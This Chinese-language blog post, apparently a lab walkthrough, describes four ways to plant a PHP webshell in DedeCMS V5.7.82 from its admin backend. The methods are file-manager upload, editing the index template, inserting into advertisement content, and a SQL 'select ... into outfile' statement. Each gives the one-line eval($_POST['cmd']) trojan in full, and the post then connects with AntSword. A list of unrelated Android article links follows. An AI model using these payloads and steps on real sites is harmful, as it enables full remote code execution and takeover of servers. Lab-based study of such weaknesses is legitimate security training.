DedeCMS-V5.7.82-UTF8织梦

先进行安装

然后进入首页和管理员后台 内容要在后台进行操作

首页

后台

1.通过文件管理器上传WebShell

访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshel

登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话代

码上传

2.修改模板文件拿shell

点击模板 默认模板管理 index.html 然后点击修改

写入一句话木马<?php phpinfo();eval($_POST['cmd']);?>

然后保存

接着点击生成 更新主页HTML--》将主页位置修改为【../index.php】--》点击 【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...

3.后台任意命令执行拿WebShell

<?php phpinfo();eval($_POST['cmd']);?>

步骤一:点击 【模块】 --》 【广告管理】--》〔【增加一个新广告】--》在【广告内容】 处添

加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

拿蚁剑测试连接

4.SQL命令行

输入一句话木马

select "<?php phpinfo();eval($_POST['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/uploads/shell.php"

相关推荐
撩得Android一次心动1 小时前
Android 四大组件——Activity
android
TimeFine1 小时前
Android 网络请求超时?可能与连接池和脏连接有关
android
Digitally3 小时前
如何将安卓手机备份到电脑?7种方法
android
火柴就是我4 小时前
android:enableJetifier=true 再学习
android·flutter
杨筱毅4 小时前
【Android】【底层原理】深入解析SELinux模块
android·底层机制
Tom4i4 小时前
基于 Launcher3 的 iOS 风格桌面 04 拖拽和移位
android
2501_915106324 小时前
iOS 反编译防护工具与实战组合 从静态侦察到 IPA 成品加固的工程化路径
android·ios·小程序·https·uni-app·iphone·webview
游戏开发爱好者87 小时前
iOS 26 iPhone 使用记录分析 多工具组合构建全方位设备行为洞察体系
android·ios·小程序·uni-app·cocoa·iphone·webview
zhangphil14 小时前
HARDWARE 属性的Bitmap与普通Bitmap,GPU与RenderThread渲染与处理方式异同比较,Android
android
消失的旧时光-194316 小时前
Flutter 异步编程:Future 与 Stream 深度解析
android·前端·flutter